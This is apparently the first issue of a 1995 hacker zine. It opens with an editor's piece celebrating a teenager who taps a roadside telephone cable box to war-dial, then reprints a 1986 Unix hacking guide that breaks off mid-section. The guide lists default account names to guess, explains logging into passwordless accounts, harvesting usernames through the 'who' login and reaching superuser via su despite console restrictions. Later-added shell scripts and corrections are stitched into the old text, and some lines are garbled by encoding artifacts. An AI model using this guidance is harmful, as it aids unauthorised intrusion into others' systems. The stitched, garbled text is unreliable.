
Issue #1 of Hackers zine (M. Scanlon). Includes


                        H A C K E R S

                  Issue #1, August 4, 1995

                  edited by: Revolution

-----------------------------------------------------------------
                  Table of Contents

From the editor . . . . . . . . . . . . . . . . . . Revolution

Unix Use and Security From The Ground Up . . . . . The Prophet

DBS Hackers Encounter CODE 99 (Part 1) . . . . . .David Lawson

DBS Hackers Encounter CODE 99 (Part 2) . . . . . .David Lawson

Sendmail Bugs and Exploits List v.01b . . . . . . Per1com/Xer0

Beige Boxing. . . . . . . . . . . . . . . . . . . . Revolution

I wanna be a hacker when I grow up. . . . . . . . . . . . Tarc

The End. . . . . . . . . . . . . . . . . . . . . . .Revolution
-------------------------------------------------------------------
copyright 1995 by Mike Scanlon. All articles remain the property of
their authors and may be reprinted with their permission. This
zine may be reprinted freely as a whole. HACKERS is published
monthly by Mike Scanlon; to be added or dropped from the
subscription list, or to submit articles, mail [email protected]
-------------------------------------------------------------------

File #1 of 8...

                        From the Editor

It was rather light out for two in the morning, the moon
shining in its fullness to the west over the forest. The corner
store lights had just gone out, its owner gone upstairs to sleep,
as the rest of the residents of this small upstate New York
community had done hours ago.
Except one.
A laptop computer and a ripped up phone jack were the only
pieces of equipment that made this teenager mysteriously different
than the other troublemakers out at this hour.
At the foot of the bridge stood a large telephone pole, which
held a box at its bottom labeled MIRROR IMAGE CABLE. Two handles
were undone and a thousand pairs of terminals were uncovered.
Terminals to the world. Two alligator clips were attached to a
predetermined pair, a roll of wire unwound into the forest, and the
laptop was jacked in and booted up. A program called autoscan was
called, and the teenager unrolled a sleeping bag, and ate twinkies
while the program ran.
Eventually, he undid the laptop and went home, with another
list of numbers to try, another list of worlds to explore.

The story above describes one species of the diverse kingdom
of hackers. This zine is by, for, and about every species in that
mysterious kingdom. I began this zine to start where Mondo 2000
and Wired left off: reality. Who are the hackers?
I hope for this zine to not only become a repository for
articles about hacks, but also about hackers. So if you have
something to write about a hack you've accomplished, such as most
of the articles that line this issue's electrons, send it in. But
if you have an article about hackers, what you think about them,
whether it be hackers in the Mitnick sense or in the Levy sense, by
all means send that in also.
Although I always welcome any and all submissions, I
have a few things in mind for the next issue which I hope someone
out there will have some input on: pirate radio, recent phreaking
techniques, and some philosophy on the hacker ethic. All comments
and criticisms go to [email protected].
* * * * * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies...all of these articles
are for informational purposes only, Mike Scanlon and the respective
authors are not responsible for any illegal acts caused by that
information.
-------------------------------------------------------------------
File #2 of 8, an oldie but goodie...


                *************************************************
                *************************************************
                **                                             **
                **         Unix Use and Security From          **
                **                The Ground Up                **
                **                                             **
                **                     by                      **
                **                                             **
                **                 The Prophet                 **
                **                                             **
                **                                             **
                *************************************************
                *************************************************

December 5, 1986.

INTRODUCTION
------------
        The Unix operating system is one of the most heavily used mainframe
operating systems today. It runs on many different computers (Dec VAX's,
AT&T's 3bx series, PDP-11's, and just about any other you can think of-
including PC's), and there are many different, but pretty much similar,
versions of it. These Unix clones go by many different names- here are the
most common: Xenix, Ultrix, Ros, IX/370 (for the IBM 370), PCIX (for the
IBM PC), and Berkeley (BSD) Unix. This file will concentrate on AT&T System
V Unix, probably the most heavily used version. (The next most heavily used
is Berkeley Unix.) This file will cover just about everything all but THE
most advanced hacker will need to know about the Unix system, from the most
rodent information to advanced hacking techniques. This is the second
version of this file, and as I discover any errors or new tricks, I will
update it. This file is, to the best of my knowledge, totally accurate,
however, and the techniques in it will work just as described herein. Note,
that these techniques will work on System V Unix. Not necessarily all, but
most, should work on most other versions of Unix as well. Later, if this
file is received well, and there is demand for another, I will release a
file on yet more advanced techniques. If you wish to contact me, I can be
reached several ways. First, on these boards:

Shadow Spawn            219-659-1503
Private Sector          201-366-4431 (As prophet, not The Prophet...some
                                      rodent stole my name.)
Ripco                   312-528-5020
Stalag 13               215-657-8523
Phreak Klass 2600       806-799-0016

Or at this voice message system:

800-556-7001
Box 7023

I welcome any suggestions, corrections, or feedback of any kind. And lastly,
thanks for taking the time to read this:

THE USUAL DISCLAIMER:
---------------------
        This file is for [of course] informational purposes only. <Snicker> I
don't take responsibility for anything anyone does after reading this file.
______________________________________________________________________________

IDENTIFYING UNIX SYSTEMS AND LOGGING IN
---------------------------------------
        A Unix system can easily be identified by its prompts. When you first
connect to a Unix system, you should receive the login prompt, which is
usually "Login:" (Note, that the first character may or may not be
capitalized.) On some systems, this prompt may be ";Login:" or "User:"
(Again, the first letter may or may not be capitalized.) This may be preceded
by a short message, (usually something like "WARNING!!! This system is for
authorized users only!"), the name of the company that owns the system, or
the uucp network name of the system. (The uucp facilities will be explained
in detail later.) At this point, you should enter the user name and press
return. (You should be in lowercase if your terminal supports it.) You should
then receive the password prompt, "Password:" (And yet again, the "P" may or
may not be capitalized.) At this point, you should enter your password and
press return. If you have specified the correct username/password pair, you
will then be admitted into the system. If you have entered a non-existent
username or an incorrect password, you will receive the message "Login
incorrect" and will be returned to the login prompt. There is little
information given before login, and there is no way to find valid usernames
from pre-login information.
        There are no "default" passwords in Unix. When the system is initially
set up, none of the default accounts or any of the accounts created by the
system operators has a password, until the system operator or the account
owner sets one for the account. Often, lazy system operators and unwary
users do not bother to password many (and in some cases, all) of these
accounts. To log in under an account that doesn't have a password, you have
only to enter the username at the login prompt.
        You may encounter some occasional error messages when attempting to
log in under certain accounts. Here are some of the more common messages,
and their causes:
        1. "Unable to change directory to /usr/whatever"-This means that the
                account's home directory, the directory which it is placed in
                upon logon, does not exist. On some systems, this may prevent
                you from logging in under that account, and you will be
                returned to the login prompt. On other systems, you will simply
                be placed in the root directory. If this is the case, you will
                see the message "Changing directory to '/'".
        2. "No shell"-this means that the account's shell, or command
                interpreter, does not exist. On some systems, the account will
                not be allowed to log in, and you will be returned to the login
                prompt. On other systems, the account will be admitted into the
                system using a default shell, usually the Bourne shell. (The
                shell will be explained later.) If this is the case, you will
                see the message "Using /bin/sh".

UNIX ACCOUNTS
-------------
        There are two types of Unix accounts-user and superuser accounts. User
accounts are the normal user accounts. These accounts have no privileges.
Superuser accounts are the system operator accounts. These accounts have full
privileges, and are not bound by the file and directory protections of other
users. In Unix, there is no hierarchy of privileges-either an account has
full privileges, or it has none.
        Unix usernames are up to 14 characters long, but usually are within
the range of 1-8. The usernames can contain almost any characters, including
control and special characters. (The accounts will usually not contain the
characters @, control-d, control-j, or control-x, as these characters have
special meanings to the Unix operating system.) The Unix system comes
initially configured with quite a few default accounts, some of which are
superuser and some of which are only user-level accounts. Here is a list of
the default accounts which usually have superuser privileges:
root (Always!)
makefsys
mountfsys
umountfsys
checkfsys

The root account is always present on the system, and always has superuser
capabilities. (Note: most Unix System V systems come initially set up with a
security feature that prevents superuser accounts from logging in remotely.
If you attempt to log in under a superuser account remotely on a system with
this feature, you will receive the message "Not on console", and will be
refused admission to the operating system. This will NOT prevent you from
using superuser accounts remotely-you simply have to log in under a user
account and then switch over to a superuser account using the su utility,
which will be described later.)
Here is a list of the user-level default accounts:
lp
daemon
trouble
nuucp
uucp
bin
rje
adm
sysadm
sync

The bin account, although it is only a user account, is particularly
powerful, as it has ownership of many of the system's important directories
and files. Although these are the only default accounts on System V Unix,
there are many other accounts which I have found to be common to many Unix
systems. Here is a list of some of the accounts I have found on many Unix
systems:
batch     admin     user      demo      test
field     unix      guest     pub       public
standard  games     general   student   help
gsa       tty       lpadmin

Also try variations on the account names, such as rje1, rje2, user1, user2,
etc. Also, try variations on people's names and initials, such as doej, doe,
john, johnd, jjd, etc.
        No matter what the format for the usernames, one thing is common to
all systems-almost all of the usernames will begin with a lowercase letter.
There is a good reason for this-when logging into the system, if the first
character of the username you type in is in upper-case, the system
automatically assumes that your terminal does not support lower-case. It will
then send all output to you in upper-case, with characters that are supposed
to be upper-case preceded by a backslash ("\", the Unix escape character), to
differentiate them from the characters which are meant to be in lower-case.
Unix *always* differentiates between the cases, so it is best to stay in
lower-case while on the system.
        As mentioned before, there are no "default" passwords on Unix. When an
account is created, it has no password, until the superuser or the account's
owner sets one for it. Unix passwords are a maximum of 11 characters. The
password may contain any character, and the system distinguishes between
upper and lower case characters. Many Unix systems implement a special
security feature under which passwords must contain at least 2
non-alphanumeric characters (similar to Compuserve's password protection).
Yet another password security feature of Unix allows the superuser to set an
expiration date on users' passwords.
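The two account facts above, that root always has superuser power and that accounts may exist with no password set at all, are the first things an administrator should check on a machine like this. Added here as an example (not from the original article): a shell function that reads a passwd-format file and reports accounts whose password field is empty or whose UID is 0 under a name other than root; the sample file is constructed and represents no real system.

```shell
#!/bin/sh
# Audit a passwd(5)-format file for two conditions described in the article:
#   NOPASS  - the password field is empty, so the bare username logs in
#   UID0    - a superuser (UID 0) account that is not root
# Usage: audit_passwd /path/to/passwd   (prints one finding per line)
audit_passwd() {
    awk -F: '
        NF < 7                   { next }                        # skip malformed lines
        $2 == ""                 { printf "NOPASS  %s\n", $1 }
        $3 == 0 && $1 != "root"  { printf "UID0    %s\n", $1 }
    ' "$1"
}

# Number of findings, so a caller can gate on the result.
audit_count() {
    audit_passwd "$1" | wc -l | tr -d ' '
}

# Constructed sample in System V /etc/passwd layout (assumption, not a real
# system):  name:password:uid:gid:comment:home:shell
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:Super User:/:/bin/sh
bin:x:2:2:System Admin:/bin:/bin/sh
sync::3:3:Sync Login:/:/bin/sync
guest::100:100:Guest Account:/usr/guest:/bin/sh
toor:x:0:0:Second Root:/:/bin/sh
who::101:101:Who Login:/:/bin/who
EOF

# Report on the sample: expect sync, guest and who as NOPASS, toor as UID0.
audit_passwd "$SAMPLE_PASSWD"
```

Run against a real /etc/passwd the same function flags any account an operator forgot to password and any second UID-0 login, which are the gaps the article says are commonly left open.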

COMMAND LOGINS
--------------
        Many systems have accounts known as "command logins". These are
accounts that log in, execute a single command, and are then logged out.
These accounts rarely have passwords. Here is a list of common command
logins:
who     -This is a particularly useful command login. When you enter this as
        the username on a system with this particular account, the system will
        display a list of the users currently on the system. A good way to get
        valid usernames to hack.
time    -Not very useful. Just displays the time.
date    -Ditto the above, but displays the current date. Great if you don't
        have a calendar.
sync    -This default account is sometimes set up as a command login. It merely
        executes the sync command, which causes any data which is meant to be
        stored to be written to disk.

UNIX SPECIAL CHARACTERS
-----------------------
        The Unix operating system interprets certain characters in special
ways. Provided here is a list of those special characters, and their meanings
to the Unix operating system:

Control-D       -This is the Unix end-of-file character.
Control-J       -Some systems interpret this, rather than Control-M, as the
                return character, while others may use both. The vast majority,
                however, will only use Control-M.
Control-Delete  -This is the Unix kill character. It will automatically end
                your current process.
@               -Some systems use this as the kill character.
\               -This is the Unix escape character. Its main use is to
                differentiate between upper- and lower-case characters when
                logged in on a terminal that only supports upper-case. For
                instance, if you wanted to send the command "cd /Mrs/data",
                (never mind what it does right now), you would type this:
                (this is how it would look on your upper-case only terminal)
                CD /\MRS/DATA
                The backslash before the M would let the system know that the M
                is supposed to be upper-case, while the others would simply be
                interpreted as lower-case.

        These characters will rarely be used in usernames and passwords
because of the way they are interpreted. Note, however, that these values may
usually be changed once inside the system using the stty command, which will
be explained later. For instance, the end of file character could be changed
to control-A if you wished.

THE UNIX SHELL
--------------
        The Unix shell is the command interpreter program that accepts your
input and carries out your commands. It is NOT the operating system itself,
it is the interface between the user and the operating system. The shell is
a program that is executed when you are logged in, and when you end the shell
program, you are logged out of the system. There is nothing special about the
shell program-it is just a regular program, like any other on the Unix
system. In fact, once you are logged on, you can execute another shell just
as you would execute a program. This ability, to run multiple shell levels,
can be used to perform some interesting tricks that will be detailed later in
this file. There is also more than one kind of shell. All the shells perform
the same basic function of interpreting the user's commands, but there are a
few differences. Here is a list of the different shells, their unique
characteristics, and how to tell which shell you are using:

Shell
-----
sh      -This is the Bourne shell, the standard shell of Unix System V, and the
        focus of this file. This shell gives user-level accounts a command
        prompt of "$", and "#" for superuser accounts. On Berkeley BSD Unix,
        this shell gives an ampersand ("&") prompt.

csh     -This is the C shell, developed by the Berkeley University Science
        department. This shell is pretty much the same as the Bourne shell, but
        features different shell programming control structures [shell
        programming will be explained later, in the section on Unix software
        development], and has a few luxuries such as aliasing (giving a command
        or a series of commands a new name), and it keeps a history of the
        commands you enter. This shell gives a "%" prompt for user accounts and
        a "#" prompt for superuser accounts.

ksh     -This is the new, Korn shell. This shell combines features of both the
        Bourne shell and the C shell. It boasts the Bourne shell's easier shell
        programming, along with the C shell's aliasing and history. Its prompts
        are "$" for users and "#" for superusers.

rsh     -This is the restricted Bourne shell. It is used for accounts that the
        superuser wishes to restrict the commands available to. It will not
        allow you to execute commands outside of your searchpath (which will be
        explained later, also, in the section on software development), and
        will not let you change directories or change the values of shell
        variables. In all other respects, it is similar to the Bourne shell. A
        later section of this file will detail ways to overcome the
        restrictions of this shell.

ua      -This is a lousy, menu-driven shell for the AT&T Unix PC. (Yes, there
        are some of those with dialups!) It implements a lousy windowing
        system that is SLOOOW, even at 2400 baud. Luckily, you can exit to the
        Bourne shell from the ua shell.

        These are by no means all of the shells you will run across. These are
only the "official" shells provided by the distributors of the Unix operating
system. I've run across many "home-made" shells in my time. Also, any
compiled program can be used as a shell. For instance, I've used systems run
by businesses where one account logged in using an accounting program as a
shell. This prevented the account from being used to do anything other than
use the accounting program. Other good examples of this are the command
logins-the who command login, for example, uses the who program as its shell.
When the program is finished, the account is logged out. You will most
definitely encounter other such accounts as you hack Unix.

UNIX FILES AND DIRECTORIES
--------------------------
        Unix files and directories are referenced with pathnames, a la MS-DOS.
If you are familiar with MS-DOS, then you should have no problem
understanding this section. Unix files and directories are referenced in
almost the exact same way-the only difference is that it uses the "/"
character, not the backslash, to separate the directories in the pathname.
        Pathnames are a simple concept to understand, but are difficult to
explain. Imagine the system's files and directories laid out in a tree
fashion, like this:

                              / (root directory)
                                      :
                                      :
                          -------------------------
                          :                       :
                          :                       :
                       usr (dir)               bill (dir)
                          :                       :
                  --------------            --------------
                  :            :            :            :
            junk (file)  source (dir)  memo (file)  names (file)
                               :

"/" is the root directory. This is the top directory in the system tree, and
all other files and directories are referenced in relation to this directory.
The root directory has 2 subdirectories in it, "usr" and "bill". In the usr
directory, there is a file called "junk" and an empty directory called
"source". In the directory bill, there are 2 files, "memo" and "names". You
specify pathnames by starting at the top of the system, "/", and tracing your
way down the system tree to the file or directory you wish to reference,
separating each directory you must pass through to get to it with a slash.
For instance, the pathname of the file "junk" would be "/usr/junk". The
pathname of the usr directory would be "/usr". The pathname of the source
directory would be "/usr/source". The pathname of the bill directory would be
"/bill", and the pathnames of the 2 files which reside in it would be
"/bill/memo" and "/bill/names".
        Files and directories can also be referenced by their base names if
they are in your current directory. For instance, if you were in the
directory "usr", you could reference the file "/usr/junk" by its base name,
"junk". If you were in the root directory, you could reference the bill
directory by its base name, "bill". You can reference the file directly above
your current directory in the system tree as ".." and your current directory
can be referenced as "."
        Unix file and directory names can be up to 14 characters in length.
The filename can contain any ASCII character, including control characters,
except a space. It may contain both upper- and lower-case, and Unix does
distinguish between the two. Unix does not use filename extensions, a la VMS
or MS-DOS, to show the kind of file a file is. A period, in Unix, is just
another character in the filename, not a separator between 2 fields in the
name. File names which begin with a period are called "hidden" files-that is,
they are only revealed if you issue a special command.
        There are 3 kinds of files in Unix. These are text files, binary
files, and device files. Text files are just what you'd think they are from
the name-files of ASCII text, just like what you're reading right now. Binary
files are executable machine-code files. (There are also executable text
files, called shell scripts, that will be explained in detail in the section
on Unix software development.) Device files are files that represent the
system's I/O devices-disk drives, terminals, etc. Remember, that Unix was
created as an environment for software development. Its designers wished for
programs written for Unix systems to be as transportable between different
models of machines running the operating system as possible. By representing
the I/O devices as files, they eliminated the incompatibility in the code
that handled I/O. The program simply has to read and write from/to the file,
and the Unix operating system handles the system-dependent details.

BASIC UNIX COMMANDS
-------------------
        This section will describe some basic Unix commands, and detail how
to get further help on-line. It will briefly provide the syntax for a few
commands you will find necessary to know in order to find your way around on
the system.
        Unix will usually only require that you use the base name of a file
or directory you wish to reference if it is in the directory you are
currently in. Most commands will also let you specify full pathnames if you
wish to reference files in other parts of the system. Most commands will also
let you use several wildcard characters when referencing files and
directories. These are:
?       -This means to accept any single character in the place of the
        question mark. For instance, "t?m" would include both "tom" and "tim".

*       -This means to accept any character, group of characters, or nothing
        in the position of the asterisk. For example, "t*m" would include
        "thom", "tom", and "tim".
[]      -This means to accept any character within the brackets in the
        position of the brackets. For instance, "t[oia]m" would include "tom",
        "tim", and "tam". You can also specify a range of characters in the
        brackets by using a hyphen. For instance, "t[a-c]m" would include
        "tam", "tbm", and "tcm".

        Most commands and programs in Unix take their input from the keyboard
and send their output to the screen. With most commands and programs,
however, you can instruct them to draw their input from a text file and
redirect their output to another file instead. For instance, assume there is
a program on the system called "encrypter", that takes its input from the
keyboard, encrypts it, and displays the encrypted data on the screen. You
could instruct the program to take its input, instead, from a previously
prepared text file using the input redirection character, "<". In Unix, as
in MS-DOS (which is based in part on Unix), you execute a program by typing
its name. You wish the program to take its input from a file in the directory
you are currently in called "top_secret". You would type
"encrypter < top_secret". The program would then read in the contents of the
file top_secret and encrypt it, then print out the encrypted form on the
screen. Suppose you wanted to use the encrypter program to encrypt files you
wished to keep private? You could redirect the encrypted output from the
screen into another file. To do this, you would use the output redirection
character, ">". Say, you wished to save the output in a file called
"private". You would type "encrypter < top_secret > private". The encrypter
program would then read in the contents of the file top_secret and write the
encrypted output into the file "private". Nothing would be displayed to the
screen. If the file private does not exist, it will be created. If it
previously existed, its contents will be erased and replaced with the output
from the encrypter program. Perhaps you would want to add to the contents of
a file rather than replace its contents? This is done with ">>". The command
"encrypter < top_secret >> private" would append the output from the
encrypter to the current contents of the file private. Again, if the file
private does not already exist, it will be created.
        Most commands have one or more options that you can specify. These
are placed after the command itself in the command line, and preceded by a
hyphen. For instance, let's say that the encrypter program had an option
called "x", which caused it to use a different encoding algorithm. You would
specify it by typing "encrypter -x". If a command has two or more options,
you can usually specify one or more together in a stream. For instance, let's
say that the encrypter program has 2 options, x and y. You could specify both
like this: "encrypter -xy". If one or more of the options requires an
argument, for example the x option requires a 2 character key, you can
specify the options separately, like this: "encrypter -xaa -y", where aa is
the 2-character key.
        The pipe character, "|", is used to channel the output of one command
or program into the input of another. For instance, suppose you had a
command called "report" that formatted documents into report format, and you
had a file called "myreport" that you wished to view in the report format.
You could type: "cat myreport | report". This would type out the contents of
the file myreport to the report command rather than the screen, and the
report command would format it and display it on the screen. (Note: this
example could have been done with I/O redirection by typing
"report < myreport"...but it makes a good example of the use of pipes.)
        You can choose to execute commands and programs in the
background-that is, the command executes, but you are free to carry out other
tasks in the meantime. To do this, type in the command line, followed by
" &". For instance, "rm * &" would delete all the files in the directory, but
your terminal would not be tied up. You would still be free to perform other
tasks. When you do this, the system will print out a number and then return
you to the system prompt. This number is the process number of the command.
Process numbers will be explained later in this section in the entry for the
command "ps". The command can be stopped before its completion with the kill
command, also explained in this section. Example:
        $rm * &
        1234
        $

Note that when you use background processing, the command or program will
still take its input from the keyboard (standard input device) and send its
output to the screen (standard output device), so if you wish for the command
to work in the background without disturbing you, you must redirect its input
(if any) and its output (if it's to the screen).
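The redirection, append, pipe and background rules above, worked through as an added example that is not part of the original article. The "encrypter" program of the text is stood in for by a rot13 filter built from tr (an assumption; no such System V command is implied), the input file is constructed, and everything happens in a scratch directory.

```shell
#!/bin/sh
# Demonstrates "<", ">", ">>", "|" and "&" exactly as the article describes
# them, using a stand-in for its hypothetical "encrypter" program.
WORK=$(mktemp -d)
cd "$WORK" || exit 1

# Stand-in for "encrypter": rot13 via tr. Reads standard input, writes
# standard output, just as the text assumes (assumption, not a real command).
encrypter() { tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

# Constructed input file, playing the role of "top_secret" in the text.
printf 'meet at the bridge\n' > top_secret

# ">" creates the output file if missing and erases it if it already exists,
# so two runs leave one line; ">>" appends, so a third run leaves two.
# Returns "<lines after two '>' runs> <lines after one '>>' run>".
overwrite_vs_append() {
    encrypter < top_secret > private
    encrypter < top_secret > private
    a=$(wc -l < private | tr -d ' ')
    encrypter < top_secret >> private
    b=$(wc -l < private | tr -d ' ')
    echo "$a $b"
}

# First line of "private" after the runs above: the encrypted text.
first_line() { head -n 1 private; }

# "|" feeds one command's output into the next one's input. Two passes
# through the rot13 stand-in give the original text back.
round_trip() { cat top_secret | encrypter | encrypter; }

# "&" runs a command in the background; the shell keeps its process number
# in $!. As the note says, a background job still owns the terminal's input
# and output unless redirected, so both are redirected here, and "kill"
# stops it before it finishes.
background_kill() {
    sleep 60 < /dev/null > /dev/null &
    pid=$!
    kill "$pid"
    wait "$pid" 2>/dev/null || true
    if kill -0 "$pid" 2>/dev/null; then
        echo "still running $pid"
    else
        echo "killed $pid"
    fi
}

overwrite_vs_append
first_line
round_trip
background_kill
```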

THE COMMANDS
------------

ls -This command lists the files and subdirectories in a directo=
ry. If you=20
=09simply type "ls", it will display the files in your current direct=
ory.=20
=09You can also specify the pathname of another directory, and it wil=
l=20
=09display the files in it. It will not display hidden files (files w=
hose
=09name begins with a period).=20

=09Options:
=09a -This option will display all files, including hidden file=
s.

=09Example:
=09$ ls -a

=09. .. junk source
=09$

cd -This is the command used to move from one directory to anoth=
er. To go=20
=09to a directory directly below your current directory, type "cd=
=20
=09<dirname>". To move up to the directory directly above your curren=
t=20
=09directory, type "cd .." You can also jump to any directory in the=
=20
=09system from any other directory in the system by specifying the pa=
th-
=09name of the directory you wish to go to, such as "cd /usr/source".

=09Example:
=09$cd /usr/source
=09$

pwd -This prints out the pathname of the directory you are curren=
tly in.=20
=09Useful if you forget where you're at in the system tree.

=09Example:
=09$pwd
=09/usr/source

cat	-Displays the contents of a text file on the screen. The correct syntax
	is "cat <filename>". You can use basenames or pathnames.

	Example:
	$cat memo
	Bill,
	  Remember to feed the cat!
	-Martha
	$

rm	-This deletes a file. Syntax: "rm <filename>".

	Example:
	$rm junk
	$

cp	-Copies a file. Syntax: "cp file1 file2", where file1 is the file you
	wish to copy, and file2 is the name of the copy you wish to create. If
	file2 already exists, it will be overwritten. You may specify pathnames
	for one or both arguments.

	Example:
	$cp /usr/junk /usr/junk.backup

stty	-Displays/sets your terminal characteristics. To display the current
	settings, type "stty". To change a setting, specify one of the options
	listed below.

	Options:
	echo		-System echoes back your input.
	-echo		-System doesn't echo your input.
	intr 'arg'	-Sets the break (interrupt) character. The format is '^c'
			for control-c, etc. '' means no break character.
	erase 'arg'	-Sets the backspace character. Format is '^h' for control-h,
			etc. '' means no backspace character.
	kill 'arg'	-Sets the kill character (which erases the whole line you
			are typing, so you can start it over). Format is the same
			as for intr and erase, '^[character]', with '' meaning no
			kill character.

	Example:
	$stty intr '^c' erase '^h'
	$stty
	stty -echo intr '^c' erase '^h' kill '^x'

lpr	-This command prints out a file on the Unix system's printer, for you
	to drop by and pick up (if you dare!) The format is "lpr <filename>"
	on BSD systems; System V spells the command "lp", as in the example.

	Example:
	$lp junk

ed	-This is a text file line editor. The format is "edit <filename>"
	("edit" is the beginner's front end to the ex editor found on many
	systems; plain "ed" takes the same line commands but prints no ":"
	prompt and ends text input with a line containing only a period). The
	file you wish to modify is not modified directly by the editor; it is
	loaded into a buffer instead, and the changes are only made when you
	issue a write command. If the file you are editing does not already
	exist, it will be created as soon as you issue the first write command.
	When you first issue the edit command, you will be placed at the
	command prompt, ":". Here is where you issue the various commands. Here
	is a list of some of the basic editor commands.
	#	-This is any number, such as 1, 2, etc. This will move you down
		to that line of the file and display it.
	d	-This deletes the line you are currently at. The line after it
		then becomes the current line and is displayed (if you deleted
		the last line of the file, the line before it becomes current
		instead, as in the example below).
	a	-Begin adding lines to the file, just after the line that you
		are currently on. This command will put you in the text input
		mode. Simply type in the text you wish to add. To return to the
		command mode, type return to get to an empty line, and press
		the break key (which is whatever character you have set as your
		break key). It is important to set the break character with
		stty before you use the editor!
	/	-Searches for a pattern in the file. For example, "/junk" would
		search the file from your current line down for the first line
		which contains the string "junk", and will move you to that
		line if it finds one.
	i	-Insert. Works similar to a, except that the text is inserted
		before the line you are currently on.
	p	-Prints out a line or lines in the buffer. "p" by itself will
		display your current line. "#p" will display the line "#".
		You may also specify a range of lines, such as "1,3p" which
		will display lines 1-3. "1,$p" will print out the entire file.
	w	-Write the changes in the buffer to the file.
	q	-Quit the editor.

	Example:
	$edit myfile
	Editing "myfile" [new file]
	0 lines, 0 characters
	:a
	I am adding stupid text to myfile.
	This is a test.
	^c [this is assumed as a default break character in this example]
	:1,$p
	I am adding stupid text to myfile.
	This is a test.
	:2
	This is a test.
	:d
	I am adding stupid text to myfile.
	:w
	:q
	$

grep	-This command searches for strings of text in text files. The format is
	"grep [string] [file]". It will print out every line in the file that
	contains the string you specified.

	Options:
	v	-Invert. This will print out every line that DOESN'T contain
		the string you specified.

	Example:
	$ grep you letter
	your momma!
	I think you're going to get caught.
	$

who	-This will show the users currently logged onto the system.

	Example:
	$ who

	root	console	Mar 10 01:00
	uucp	contty	Mar 30 13:00
	bill	tty03	Mar 30 12:15
	$
	Now, to explain the above output: the first field is the username of
	the account. The second field shows which terminal the account is on.
	Console is, always, the system console itself. On many systems where
	there is only one dialup line, the terminal for that line is usually
	called contty. The tty## terminals can usually be either dialups or
	local terminals. The last fields show the date and time that the user
	logged on. In the example above, let's assume that the current date is
	March 30, and the time is 13:00 (1 pm). Notice that the time is in 24
	hour format. Now, notice that the root (superuser) account logged in on
	March 10! Some systems leave the root account logged in all the time on
	the console. So, if this is done on a system you are using, how can you
	tell if the system operator is really online or not? Use the ps
	command, explained next.

ps	-This command displays information about system processes.

	Options:
	u	-This displays information on a specific user's processes. For
		instance, to display the root account's processes:
		$ ps -uroot

		PID	TTY	TIME	CMD
		1234	console	01:00	sh
		1675	?	00:00	cron
		1687	console	13:00	who
		1780	tty09	12:03	sh

		Now, to explain that: the first field is the process number.
		Each and every time you start a process, running a program,
		issuing a command, etc., that process is assigned a unique
		number. The second is which terminal the process is being run
		on. The third field, TIME, is the total processor time the
		process has used so far, not the time it was started (the
		sample output above was written as if it were; use "ps -f" and
		read its STIME column if you want the start time). The last
		field is the base name of the program or command being run.
		A user's lowest process number is usually his login (shell)
		process, since numbers are handed out in increasing order and
		only wrap around after many thousands of processes. Note that
		the lowest process in the above example is 1234. This process
		is being run on the console tty, which means the superuser is
		logged on at the system console. Note the ? as the tty in the
		next entry, for the cron process. You can ignore any processes
		with a question mark as the terminal. These processes are not
		being carried out by a user; they are being carried out by the
		system under that user's id. Next, note the entry for process
		# 1687, on the console terminal, "who". This means that the
		superuser is executing the who command...which means he is
		currently actively on-line. The next entry is interesting...it
		shows that the root user has a shell process on the terminal
		tty09! This means that someone else is logged in under the root
		account, on tty09. If more than one person is using an account,
		this option will display information for all of them, unless
		you specify the next option...

	t	-This allows you to select processes run on a specific
		terminal. For example:
		$ps -t console
		will show all the processes currently being run on the console.

		Example:
		Remember, options can usually be combined. This will show all
		the root user's processes being run on the system console:
		$ ps -uroot -tconsole

		PID	TTY	TIME	CMD
		1234	console	01:00	sh
		1687	console	13:00	who
		$
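The check described above (is the account logged in from more than one terminal?) carried out by a small script. This is an added example and not part of the original article; the sample listing is constructed to match the one in the text, and the script assumes the four-column "PID TTY TIME CMD" layout shown there.

```sh
#!/bin/sh
# Added example (not from the original article): read the listing that
# "ps -u<user>" prints and report the terminals on which that user has a
# shell, so a second login under an account such as root stands out.

# login_terminals: print, one per line and sorted, each terminal carrying
# a shell process.  The column header and daemon entries whose TTY is "?"
# are skipped.  Login shells are often listed with a leading "-" (-sh).
login_terminals() {
    while read pid tty time cmd; do
        [ "$pid" = PID ] && continue        # column header
        [ "$tty" = "?" ] && continue        # not attached to a terminal
        case $cmd in
            sh|csh|ksh|-sh|-csh|-ksh) echo "$tty" ;;
        esac
    done | sort -u
}

# count_logins: how many distinct terminals have a shell; more than one
# means the account is in use from more than one place.
count_logins() {
    login_terminals | wc -l | tr -d ' '
}

# Constructed sample, the same listing as in the text above:
sample='PID TTY TIME CMD
1234 console 01:00 sh
1675 ? 00:00 cron
1687 console 13:00 who
1780 tty09 12:03 sh'

# Usage:  printf "%s\n" "$sample" | login_terminals     -> console, tty09
#         printf "%s\n" "$sample" | count_logins        -> 2
```

On a live system the input would come from "ps -uroot | login_terminals"; the daemon entries are dropped because a process with no terminal tells you nothing about who is sitting where.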

kill	-Sends a signal to a process; the default signal asks it to terminate.
	Syntax: "kill [-signal#] process#". You must know the process number to
	kill it. The optional number selects which signal is sent (the manual
	entry for signal lists them). The default, signal 15, can be caught or
	ignored by the program, so certain kinds of processes, like shell
	processes, may survive it. Signal 9 cannot be caught or ignored, so
	"kill -9" will stop any process. You must have superuser capabilities
	to kill another user's processes (unless he's using your account).

	Example:
	$kill -9 1234
	1234 killed.
	$

write	-This command is for on-line realtime user to user communications. To
	communicate with a user, type "write <username>". If more than one
	person is logged in under that user name, you must specify a specific
	terminal you wish to speak to. When you do this, the person you wish
	to communicate with will see:
	Message from [your account name] tty## [<--your terminal]

	Now you can type messages, and they will be displayed on that person's
	terminal when you press return. When you are finished, press control-D
	to quit.

	Example:
	$ write root
	Fuck you I'm a hacker! [This is not advised.]
	^d
	$

mail	-The Unix mail facilities, used to send/receive mail. To send mail,
	type "mail <username>". Enter your message and press control-d to send.
	To read your mail, type "mail". Your first letter will be displayed,
	and then you will be given a "?" prompt.
	Here are the legal commands you give at this point:
	##	-Read message number ##.
	d	-Delete last message read.
	+	-Go to next message.
	-	-Move back one message.
	m	-Send mail to user.
	s	-Save last message read. You can specify the name of the file
		to which it is saved, or it will be saved to the default file,
		mbox.
	w	-Same as s, but will save the message without the mail file
		header.
	x	-Exit without deleting messages that have been read.
	q	-Exit, deleting messages that have been read.
	p	-Print last message read again.
	?	-Lists these commands.

	Examples:
	To send mail:
